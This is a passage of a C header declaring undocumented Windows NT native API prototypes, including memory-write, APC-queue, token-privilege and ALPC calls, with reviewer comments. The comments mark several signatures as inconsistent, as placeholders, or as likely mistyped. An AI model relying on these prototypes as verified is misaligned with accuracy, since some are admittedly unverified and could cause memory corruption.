IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PFILE_SEGMENT_ELEMENT SegmentArray,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL);
EXTERN_C NTSTATUS NtOpenThreadTokenEx(
IN HANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN BOOLEAN OpenAsSelf,
IN ULONG HandleAttributes,
OUT PHANDLE TokenHandle);
EXTERN_C NTSTATUS NtOpenProcessTokenEx(
IN HANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN ULONG HandleAttributes,
OUT PHANDLE TokenHandle);
EXTERN_C NTSTATUS NtQueryPerformanceCounter(
OUT PLARGE_INTEGER PerformanceCounter,
OUT PLARGE_INTEGER PerformanceFrequency OPTIONAL);
EXTERN_C NTSTATUS NtEnumerateKey(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_INFORMATION_CLASS KeyInformationClass,
OUT PVOID KeyInformation OPTIONAL,
IN ULONG Length,
OUT PULONG ResultLength);
EXTERN_C NTSTATUS NtOpenFile(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG ShareAccess,
IN ULONG OpenOptions);
EXTERN_C NTSTATUS NtDelayExecution(
IN BOOLEAN Alertable,
IN PLARGE_INTEGER DelayInterval);
EXTERN_C NTSTATUS NtQueryDirectoryFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass,
IN BOOLEAN ReturnSingleEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN BOOLEAN RestartScan);
EXTERN_C NTSTATUS NtQuerySystemInformation(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtOpenSection(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtQueryTimer(
IN HANDLE TimerHandle,
IN TIMER_INFORMATION_CLASS TimerInformationClass,
OUT PVOID TimerInformation,
IN ULONG TimerInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtFsControlFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG FsControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength);
EXTERN_C NTSTATUS NtWriteVirtualMemory(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN PVOID Buffer,
IN SIZE_T NumberOfBytesToWrite,
OUT PSIZE_T NumberOfBytesWritten OPTIONAL);
EXTERN_C NTSTATUS NtCloseObjectAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN BOOLEAN GenerateOnClose);
EXTERN_C NTSTATUS NtDuplicateObject(
IN HANDLE SourceProcessHandle,
IN HANDLE SourceHandle,
IN HANDLE TargetProcessHandle OPTIONAL,
OUT PHANDLE TargetHandle OPTIONAL,
IN ACCESS_MASK DesiredAccess,
IN ULONG HandleAttributes,
IN ULONG Options);
EXTERN_C NTSTATUS NtQueryAttributesFile(
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PFILE_BASIC_INFORMATION FileInformation);
EXTERN_C NTSTATUS NtClearEvent(
IN HANDLE EventHandle);
EXTERN_C NTSTATUS NtReadVirtualMemory(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress OPTIONAL,
OUT PVOID Buffer,
IN SIZE_T BufferSize,
OUT PSIZE_T NumberOfBytesRead OPTIONAL);
EXTERN_C NTSTATUS NtOpenEvent(
OUT PHANDLE EventHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtAdjustPrivilegesToken(
IN HANDLE TokenHandle,
IN BOOLEAN DisableAllPrivileges,
IN PTOKEN_PRIVILEGES NewState OPTIONAL,
IN ULONG BufferLength,
OUT PTOKEN_PRIVILEGES PreviousState OPTIONAL,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtDuplicateToken(
IN HANDLE ExistingTokenHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN BOOLEAN EffectiveOnly,
IN TOKEN_TYPE TokenType,
OUT PHANDLE NewTokenHandle);
EXTERN_C NTSTATUS NtContinue(
IN PCONTEXT ContextRecord,
IN BOOLEAN TestAlert);
EXTERN_C NTSTATUS NtQueryDefaultUILanguage(
OUT PLANGID DefaultUILanguageId);
EXTERN_C NTSTATUS NtQueueApcThread(
IN HANDLE ThreadHandle,
IN PKNORMAL_ROUTINE ApcRoutine,
IN PVOID ApcArgument1 OPTIONAL,
IN PVOID ApcArgument2 OPTIONAL,
IN PVOID ApcArgument3 OPTIONAL);
EXTERN_C NTSTATUS NtYieldExecution();
EXTERN_C NTSTATUS NtAddAtom(
IN PWSTR AtomName OPTIONAL,
IN ULONG Length,
OUT PUSHORT Atom OPTIONAL);
EXTERN_C NTSTATUS NtCreateEvent(
OUT PHANDLE EventHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN EVENT_TYPE EventType,
IN BOOLEAN InitialState);
EXTERN_C NTSTATUS NtQueryVolumeInformationFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FsInformation,
IN ULONG Length,
IN FSINFOCLASS FsInformationClass);
EXTERN_C NTSTATUS NtCreateSection(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PLARGE_INTEGER MaximumSize OPTIONAL,
IN ULONG SectionPageProtection,
IN ULONG AllocationAttributes,
IN HANDLE FileHandle OPTIONAL);
EXTERN_C NTSTATUS NtFlushBuffersFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock);
EXTERN_C NTSTATUS NtApphelpCacheControl(
IN APPHELPCACHESERVICECLASS Service,
IN PVOID ServiceData);
EXTERN_C NTSTATUS NtCreateProcessEx(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ParentProcess,
IN ULONG Flags,
IN HANDLE SectionHandle OPTIONAL,
IN HANDLE DebugPort OPTIONAL,
IN HANDLE ExceptionPort OPTIONAL,
IN ULONG JobMemberLevel);
// PUSER_STACK is a project/local type name for the initial-TEB descriptor --
// confirm it is declared before this prototype is used.
EXTERN_C NTSTATUS NtCreateThread(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ProcessHandle,
OUT PCLIENT_ID ClientId,
IN PCONTEXT ThreadContext,
IN PUSER_STACK InitialTeb,
IN BOOLEAN CreateSuspended);
EXTERN_C NTSTATUS NtIsProcessInJob(
IN HANDLE ProcessHandle,
IN HANDLE JobHandle OPTIONAL);
// BaseAddress / RegionSize are rounded to page boundaries by the kernel and
// written back; OldProtect is mandatory (not OPTIONAL) in this declaration.
EXTERN_C NTSTATUS NtProtectVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID* BaseAddress,
IN OUT PSIZE_T RegionSize,
IN ULONG NewProtect,
OUT PULONG OldProtect);
EXTERN_C NTSTATUS NtQuerySection(
IN HANDLE SectionHandle,
IN SECTION_INFORMATION_CLASS SectionInformationClass,
OUT PVOID SectionInformation,
IN ULONG SectionInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtResumeThread(
IN HANDLE ThreadHandle,
IN OUT PULONG PreviousSuspendCount OPTIONAL);
EXTERN_C NTSTATUS NtTerminateThread(
IN HANDLE ThreadHandle,
IN NTSTATUS ExitStatus);
EXTERN_C NTSTATUS NtReadRequestData(
IN HANDLE PortHandle,
IN PPORT_MESSAGE Message,
IN ULONG DataEntryIndex,
OUT PVOID Buffer,
IN ULONG BufferSize,
OUT PULONG NumberOfBytesRead OPTIONAL);
EXTERN_C NTSTATUS NtCreateFile(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER AllocationSize OPTIONAL,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PVOID EaBuffer OPTIONAL,
IN ULONG EaLength);
EXTERN_C NTSTATUS NtQueryEvent(
IN HANDLE EventHandle,
IN EVENT_INFORMATION_CLASS EventInformationClass,
OUT PVOID EventInformation,
IN ULONG EventInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtWriteRequestData(
IN HANDLE PortHandle,
IN PPORT_MESSAGE Request,
IN ULONG DataIndex,
IN PVOID Buffer,
IN ULONG Length,
OUT PULONG ResultLength OPTIONAL);
EXTERN_C NTSTATUS NtOpenDirectoryObject(
OUT PHANDLE DirectoryHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtAccessCheckByTypeAndAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN PUNICODE_STRING ObjectTypeName,
IN PUNICODE_STRING ObjectName,
IN PSECURITY_DESCRIPTOR SecurityDescriptor,
IN PSID PrincipalSelfSid OPTIONAL,
IN ACCESS_MASK DesiredAccess,
IN AUDIT_EVENT_TYPE AuditType,
IN ULONG Flags,
IN POBJECT_TYPE_LIST ObjectTypeList OPTIONAL,
IN ULONG ObjectTypeListLength,
IN PGENERIC_MAPPING GenericMapping,
IN BOOLEAN ObjectCreation,
OUT PACCESS_MASK GrantedAccess,
OUT PULONG AccessStatus,
OUT PBOOLEAN GenerateOnClose);
EXTERN_C NTSTATUS NtWaitForMultipleObjects(
IN ULONG Count,
IN PHANDLE Handles,
IN WAIT_TYPE WaitType,
IN BOOLEAN Alertable,
IN PLARGE_INTEGER Timeout OPTIONAL);
EXTERN_C NTSTATUS NtSetInformationObject(
IN HANDLE Handle,
IN OBJECT_INFORMATION_CLASS ObjectInformationClass,
IN PVOID ObjectInformation,
IN ULONG ObjectInformationLength);
EXTERN_C NTSTATUS NtCancelIoFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock);
EXTERN_C NTSTATUS NtTraceEvent(
IN HANDLE TraceHandle,
IN ULONG Flags,
IN ULONG FieldSize,
IN PVOID Fields);
EXTERN_C NTSTATUS NtPowerInformation(
IN POWER_INFORMATION_LEVEL InformationLevel,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength);
EXTERN_C NTSTATUS NtSetValueKey(
IN HANDLE KeyHandle,
IN PUNICODE_STRING ValueName,
IN ULONG TitleIndex OPTIONAL,
IN ULONG Type,
IN PVOID SystemData,
IN ULONG DataSize);
EXTERN_C NTSTATUS NtCancelTimer(
IN HANDLE TimerHandle,
OUT PBOOLEAN CurrentState OPTIONAL);
EXTERN_C NTSTATUS NtSetTimer(
IN HANDLE TimerHandle,
IN PLARGE_INTEGER DueTime,
IN PTIMER_APC_ROUTINE TimerApcRoutine OPTIONAL,
IN PVOID TimerContext OPTIONAL,
IN BOOLEAN ResumeTimer,
IN LONG Period OPTIONAL,
OUT PBOOLEAN PreviousState OPTIONAL);
// NOTE(review): DesiredAccess is `ULONG` here but `ACCESS_MASK` in the sibling
// NtAccessCheckByTypeResultList; the two are the same underlying type, so this
// is a consistency nit rather than a functional difference.
EXTERN_C NTSTATUS NtAccessCheckByType(
IN PSECURITY_DESCRIPTOR SecurityDescriptor,
IN PSID PrincipalSelfSid OPTIONAL,
IN HANDLE ClientToken,
IN ULONG DesiredAccess,
IN POBJECT_TYPE_LIST ObjectTypeList,
IN ULONG ObjectTypeListLength,
IN PGENERIC_MAPPING GenericMapping,
OUT PPRIVILEGE_SET PrivilegeSet,
IN OUT PULONG PrivilegeSetLength,
OUT PACCESS_MASK GrantedAccess,
OUT PULONG AccessStatus);
EXTERN_C NTSTATUS NtAccessCheckByTypeResultList(
IN PSECURITY_DESCRIPTOR SecurityDescriptor,
IN PSID PrincipalSelfSid OPTIONAL,
IN HANDLE ClientToken,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_TYPE_LIST ObjectTypeList,
IN ULONG ObjectTypeListLength,
IN PGENERIC_MAPPING GenericMapping,
OUT PPRIVILEGE_SET PrivilegeSet,
IN OUT PULONG PrivilegeSetLength,
OUT PACCESS_MASK GrantedAccess,
OUT PULONG AccessStatus);
// NOTE(review): GenerateOnClose is declared `PULONG` here and in the ByHandle
// variant below, whereas NtAccessCheckAndAuditAlarm / NtAccessCheckByTypeAndAuditAlarm
// above declare it `PBOOLEAN`.  A caller passing a BOOLEAN would get a 4-byte
// write through a 1-byte object if the kernel honours the ULONG width -- verify
// against the real signature before using these two entries.
EXTERN_C NTSTATUS NtAccessCheckByTypeResultListAndAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN PUNICODE_STRING ObjectTypeName,
IN PUNICODE_STRING ObjectName,
IN PSECURITY_DESCRIPTOR SecurityDescriptor,
IN PSID PrincipalSelfSid OPTIONAL,
IN ACCESS_MASK DesiredAccess,
IN AUDIT_EVENT_TYPE AuditType,
IN ULONG Flags,
IN POBJECT_TYPE_LIST ObjectTypeList OPTIONAL,
IN ULONG ObjectTypeListLength,
IN PGENERIC_MAPPING GenericMapping,
IN BOOLEAN ObjectCreation,
OUT PACCESS_MASK GrantedAccess,
OUT PULONG AccessStatus,
OUT PULONG GenerateOnClose);
EXTERN_C NTSTATUS NtAccessCheckByTypeResultListAndAuditAlarmByHandle(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN HANDLE ClientToken,
IN PUNICODE_STRING ObjectTypeName,
IN PUNICODE_STRING ObjectName,
IN PSECURITY_DESCRIPTOR SecurityDescriptor,
IN PSID PrincipalSelfSid OPTIONAL,
IN ACCESS_MASK DesiredAccess,
IN AUDIT_EVENT_TYPE AuditType,
IN ULONG Flags,
IN POBJECT_TYPE_LIST ObjectTypeList OPTIONAL,
IN ULONG ObjectTypeListLength,
IN PGENERIC_MAPPING GenericMapping,
IN BOOLEAN ObjectCreation,
OUT PACCESS_MASK GrantedAccess,
OUT PULONG AccessStatus,
OUT PULONG GenerateOnClose);
EXTERN_C NTSTATUS NtAcquireProcessActivityReference();
EXTERN_C NTSTATUS NtAddAtomEx(
IN PWSTR AtomName,
IN ULONG Length,
IN PRTL_ATOM Atom,
IN ULONG Flags);
EXTERN_C NTSTATUS NtAddBootEntry(
IN PBOOT_ENTRY BootEntry,
OUT PULONG Id OPTIONAL);
EXTERN_C NTSTATUS NtAddDriverEntry(
IN PEFI_DRIVER_ENTRY DriverEntry,
OUT PULONG Id OPTIONAL);
EXTERN_C NTSTATUS NtAdjustGroupsToken(
IN HANDLE TokenHandle,
IN BOOLEAN ResetToDefault,
IN PTOKEN_GROUPS NewState OPTIONAL,
IN ULONG BufferLength OPTIONAL,
OUT PTOKEN_GROUPS PreviousState OPTIONAL,
OUT PULONG ReturnLength);
EXTERN_C NTSTATUS NtAdjustTokenClaimsAndDeviceGroups(
IN HANDLE TokenHandle,
IN BOOLEAN UserResetToDefault,
IN BOOLEAN DeviceResetToDefault,
IN BOOLEAN DeviceGroupsResetToDefault,
IN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION NewUserState OPTIONAL,
IN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION NewDeviceState OPTIONAL,
IN PTOKEN_GROUPS NewDeviceGroupsState OPTIONAL,
IN ULONG UserBufferLength,
OUT PTOKEN_SECURITY_ATTRIBUTES_INFORMATION PreviousUserState OPTIONAL,
IN ULONG DeviceBufferLength,
OUT PTOKEN_SECURITY_ATTRIBUTES_INFORMATION PreviousDeviceState OPTIONAL,
IN ULONG DeviceGroupsBufferLength,
OUT PTOKEN_GROUPS PreviousDeviceGroups OPTIONAL,
OUT PULONG UserReturnLength OPTIONAL,
OUT PULONG DeviceReturnLength OPTIONAL,
OUT PULONG DeviceGroupsReturnBufferLength OPTIONAL);
EXTERN_C NTSTATUS NtAlertResumeThread(
IN HANDLE ThreadHandle,
OUT PULONG PreviousSuspendCount OPTIONAL);
EXTERN_C NTSTATUS NtAlertThread(
IN HANDLE ThreadHandle);
EXTERN_C NTSTATUS NtAlertThreadByThreadId(
IN ULONG ThreadId);
EXTERN_C NTSTATUS NtAllocateLocallyUniqueId(
OUT PLUID Luid);
EXTERN_C NTSTATUS NtAllocateReserveObject(
OUT PHANDLE MemoryReserveHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN MEMORY_RESERVE_TYPE Type);
EXTERN_C NTSTATUS NtAllocateUserPhysicalPages(
IN HANDLE ProcessHandle,
IN OUT PULONG NumberOfPages,
OUT PULONG UserPfnArray);
EXTERN_C NTSTATUS NtAllocateUuids(
OUT PLARGE_INTEGER Time,
OUT PULONG Range,
OUT PULONG Sequence,
OUT PUCHAR Seed);
// NOTE(review): the last two parameters are named DataBuffer/DataCount with a
// bare `PVOID`; this looks like a placeholder for the extended-parameter list
// the real call takes.  Treat this prototype as unverified until checked.
EXTERN_C NTSTATUS NtAllocateVirtualMemoryEx(
IN HANDLE ProcessHandle,
IN OUT PPVOID lpAddress,
IN ULONG_PTR ZeroBits,
IN OUT PSIZE_T pSize,
IN ULONG flAllocationType,
IN OUT PVOID DataBuffer OPTIONAL,
IN ULONG DataCount);
EXTERN_C NTSTATUS NtAlpcAcceptConnectPort(
OUT PHANDLE PortHandle,
IN HANDLE ConnectionPortHandle,
IN ULONG Flags,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,
IN PVOID PortContext OPTIONAL,
IN PPORT_MESSAGE ConnectionRequest,
IN OUT PALPC_MESSAGE_ATTRIBUTES ConnectionMessageAttributes OPTIONAL,
IN BOOLEAN AcceptConnection);
EXTERN_C NTSTATUS NtAlpcCancelMessage(
IN HANDLE PortHandle,
IN ULONG Flags,
IN PALPC_CONTEXT_ATTR MessageContext);
EXTERN_C NTSTATUS NtAlpcConnectPort(
OUT PHANDLE PortHandle,
IN PUNICODE_STRING PortName,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,
IN ULONG Flags,
IN PSID RequiredServerSid OPTIONAL,
IN OUT PPORT_MESSAGE ConnectionMessage OPTIONAL,
IN OUT PULONG BufferLength OPTIONAL,
IN OUT PALPC_MESSAGE_ATTRIBUTES OutMessageAttributes OPTIONAL,
IN OUT PALPC_MESSAGE_ATTRIBUTES InMessageAttributes OPTIONAL,
IN PLARGE_INTEGER Timeout OPTIONAL);
// BufferLength is PSIZE_T here but PULONG in NtAlpcConnectPort above -- the two
// prototypes differ on that one parameter; keep the width in mind when sharing
// a caller between them.
EXTERN_C NTSTATUS NtAlpcConnectPortEx(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ConnectionPortObjectAttributes,
IN POBJECT_ATTRIBUTES ClientPortObjectAttributes OPTIONAL,
IN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,
IN ULONG Flags,
IN PSECURITY_DESCRIPTOR ServerSecurityRequirements OPTIONAL,
IN OUT PPORT_MESSAGE ConnectionMessage OPTIONAL,
IN OUT PSIZE_T BufferLength OPTIONAL,
IN OUT PALPC_MESSAGE_ATTRIBUTES OutMessageAttributes OPTIONAL,
IN OUT PALPC_MESSAGE_ATTRIBUTES InMessageAttributes OPTIONAL,
IN PLARGE_INTEGER Timeout OPTIONAL);
EXTERN_C NTSTATUS NtAlpcCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL);
EXTERN_C NTSTATUS NtAlpcCreatePortSection(
IN HANDLE PortHandle,
IN ULONG Flags,
IN HANDLE SectionHandle OPTIONAL,
IN SIZE_T SectionSize,
OUT PHANDLE AlpcSectionHandle,
OUT PSIZE_T ActualSectionSize);
EXTERN_C NTSTATUS NtAlpcCreateResourceReserve(
IN HANDLE PortHandle,
IN ULONG Flags,
IN SIZE_T MessageSize,
OUT PHANDLE ResourceId);
EXTERN_C NTSTATUS NtAlpcCreateSectionView(
IN HANDLE PortHandle,
IN ULONG Flags,
IN OUT PALPC_DATA_VIEW_ATTR ViewAttributes);
EXTERN_C NTSTATUS NtAlpcCreateSecurityContext(
IN HANDLE PortHandle,
IN ULONG Flags,
IN OUT PALPC_SECURITY_ATTR SecurityAttribute);
EXTERN_C NTSTATUS NtAlpcDeletePortSection(
IN HANDLE PortHandle,
IN ULONG Flags,
IN HANDLE SectionHandle);
EXTERN_C NTSTATUS NtAlpcDeleteResourceReserve(
IN HANDLE PortHandle,
IN ULONG Flags,
IN HANDLE ResourceId);
EXTERN_C NTSTATUS NtAlpcDeleteSectionView(
IN HANDLE PortHandle,
IN ULONG Flags,
IN PVOID ViewBase);
EXTERN_C NTSTATUS NtAlpcDeleteSecurityContext(
IN HANDLE PortHandle,
IN ULONG Flags,
IN HANDLE ContextHandle);
EXTERN_C NTSTATUS NtAlpcDisconnectPort(
IN HANDLE PortHandle,
IN ULONG Flags);
EXTERN_C NTSTATUS NtAlpcImpersonateClientContainerOfPort(
IN HANDLE PortHandle,
IN PPORT_MESSAGE Message,
IN ULONG Flags);
// NOTE(review): Flags is `PVOID` here while every other NtAlpc* entry in this
// list declares Flags as `ULONG` -- likely a transcription slip; confirm.
EXTERN_C NTSTATUS NtAlpcImpersonateClientOfPort(
IN HANDLE PortHandle,
IN PPORT_MESSAGE Message,
IN PVOID Flags);
EXTERN_C NTSTATUS NtAlpcOpenSenderProcess(
OUT PHANDLE ProcessHandle,
IN HANDLE PortHandle,
IN PPORT_MESSAGE PortMessage,
IN ULONG Flags,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtAlpcOpenSenderThread(
OUT PHANDLE ThreadHandle,
IN HANDLE PortHandle,
IN PPORT_MESSAGE PortMessage,
IN ULONG Flags,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtAlpcQueryInformation(
IN HANDLE PortHandle OPTIONAL,
IN ALPC_PORT_INFORMATION_CLASS PortInformationClass,
IN OUT PVOID PortInformation,
IN ULONG Length,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtAlpcQueryInformationMessage(
IN HANDLE PortHandle,
IN PPORT_MESSAGE PortMessage,
IN ALPC_MESSAGE_INFORMATION_CLASS MessageInformationClass,
OUT PVOID MessageInformation OPTIONAL,
IN ULONG Length,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtAlpcRevokeSecurityContext(
IN HANDLE PortHandle,
IN ULONG Flags,
IN HANDLE ContextHandle);
EXTERN_C NTSTATUS NtAlpcSendWaitReceivePort(
IN HANDLE PortHandle,
IN ULONG Flags,
IN PPORT_MESSAGE SendMessage OPTIONAL,
IN OUT PALPC_MESSAGE_ATTRIBUTES SendMessageAttributes OPTIONAL,
OUT PPORT_MESSAGE ReceiveMessage OPTIONAL,
IN OUT PSIZE_T BufferLength OPTIONAL,
IN OUT PALPC_MESSAGE_ATTRIBUTES ReceiveMessageAttributes OPTIONAL,
IN PLARGE_INTEGER Timeout OPTIONAL);
EXTERN_C NTSTATUS NtAlpcSetInformation(
IN HANDLE PortHandle,
IN ALPC_PORT_INFORMATION_CLASS PortInformationClass,
IN PVOID PortInformation OPTIONAL,
IN ULONG Length);
EXTERN_C NTSTATUS NtAreMappedFilesTheSame(
IN PVOID File1MappedAsAnImage,
IN PVOID File2MappedAsFile);
EXTERN_C NTSTATUS NtAssignProcessToJobObject(
IN HANDLE JobHandle,
IN HANDLE ProcessHandle);
EXTERN_C NTSTATUS NtAssociateWaitCompletionPacket(
IN HANDLE WaitCompletionPacketHandle,
IN HANDLE IoCompletionHandle,
IN HANDLE TargetObjectHandle,
IN PVOID KeyContext OPTIONAL,
IN PVOID ApcContext OPTIONAL,
IN NTSTATUS IoStatus,
IN ULONG_PTR IoStatusInformation,
OUT PBOOLEAN AlreadySignaled OPTIONAL);
EXTERN_C NTSTATUS NtCallEnclave(
IN PENCLAVE_ROUTINE Routine,
IN PVOID Parameter,
IN BOOLEAN WaitForThread,
IN OUT PVOID ReturnValue OPTIONAL);
EXTERN_C NTSTATUS NtCancelIoFileEx(
IN HANDLE FileHandle,
IN PIO_STATUS_BLOCK IoRequestToCancel OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock);
EXTERN_C NTSTATUS NtCancelSynchronousIoFile(
IN HANDLE ThreadHandle,
IN PIO_STATUS_BLOCK IoRequestToCancel OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock);
EXTERN_C NTSTATUS NtCancelTimer2(
IN HANDLE TimerHandle,
IN PT2_CANCEL_PARAMETERS Parameters);
EXTERN_C NTSTATUS NtCancelWaitCompletionPacket(
IN HANDLE WaitCompletionPacketHandle,
IN BOOLEAN RemoveSignaledPacket);
EXTERN_C NTSTATUS NtCommitComplete(
IN HANDLE EnlistmentHandle,
IN PLARGE_INTEGER TmVirtualClock OPTIONAL);
EXTERN_C NTSTATUS NtCommitEnlistment(
IN HANDLE EnlistmentHandle,
IN PLARGE_INTEGER TmVirtualClock OPTIONAL);
// NOTE(review): Wait is `BOOL` (int) here but `BOOLEAN` (UCHAR) in
// NtCommitTransaction just below; the two declarations are inconsistent with
// each other -- pick one after checking the real signature.
EXTERN_C NTSTATUS NtCommitRegistryTransaction(
IN HANDLE RegistryHandle,
IN BOOL Wait);
EXTERN_C NTSTATUS NtCommitTransaction(
IN HANDLE TransactionHandle,
IN BOOLEAN Wait);
// NOTE(review): Count suggests KeyArray is an array of handles, but the
// parameter is declared as a single `HANDLE`; a caller cannot pass an array
// through this prototype without a cast -- likely should be PHANDLE.
EXTERN_C NTSTATUS NtCompactKeys(
IN ULONG Count,
IN HANDLE KeyArray);
EXTERN_C NTSTATUS NtCompareObjects(
IN HANDLE FirstObjectHandle,
IN HANDLE SecondObjectHandle);
// Parameter names are placeholders ("UnknownParameterN"); the real types were
// not resolved when this list was produced.  Do not call through this
// prototype without verifying the signature first.
EXTERN_C NTSTATUS NtCompareSigningLevels(
IN ULONG UnknownParameter1,
IN ULONG UnknownParameter2);
EXTERN_C NTSTATUS NtCompareTokens(
IN HANDLE FirstTokenHandle,
IN HANDLE SecondTokenHandle,
OUT PBOOLEAN Equal);
EXTERN_C NTSTATUS NtCompleteConnectPort(
IN HANDLE PortHandle);
EXTERN_C NTSTATUS NtCompressKey(
IN HANDLE Key);
EXTERN_C NTSTATUS NtConnectPort(
OUT PHANDLE PortHandle,
IN PUNICODE_STRING PortName,
IN PSECURITY_QUALITY_OF_SERVICE SecurityQos,
IN OUT PPORT_SECTION_WRITE ClientView OPTIONAL,
IN OUT PPORT_SECTION_READ ServerView OPTIONAL,
OUT PULONG MaxMessageLength OPTIONAL,
IN OUT PVOID ConnectionInformation OPTIONAL,
IN OUT PULONG ConnectionInformationLength OPTIONAL);
// Placeholder parameter names/types, as with NtCompareSigningLevels above --
// unverified.
EXTERN_C NTSTATUS NtConvertBetweenAuxiliaryCounterAndPerformanceCounter(
IN ULONG UnknownParameter1,
IN ULONG UnknownParameter2,
IN ULONG UnknownParameter3,
IN ULONG UnknownParameter4);
EXTERN_C NTSTATUS NtCreateDebugObject(
OUT PHANDLE DebugObjectHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG Flags);
EXTERN_C NTSTATUS NtCreateDirectoryObject(
OUT PHANDLE DirectoryHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtCreateDirectoryObjectEx(
OUT PHANDLE DirectoryHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN HANDLE ShadowDirectoryHandle,
IN ULONG Flags);
// NOTE(review): BaseAddress is marked IN OUT but declared as a plain `PVOID`;
// the enclave base is returned to the caller, so this should almost certainly
// be `PVOID*` (same issue as NtMapViewOfSection above).
EXTERN_C NTSTATUS NtCreateEnclave(
IN HANDLE ProcessHandle,
IN OUT PVOID BaseAddress,
IN ULONG_PTR ZeroBits,
IN SIZE_T Size,
IN SIZE_T InitialCommitment,
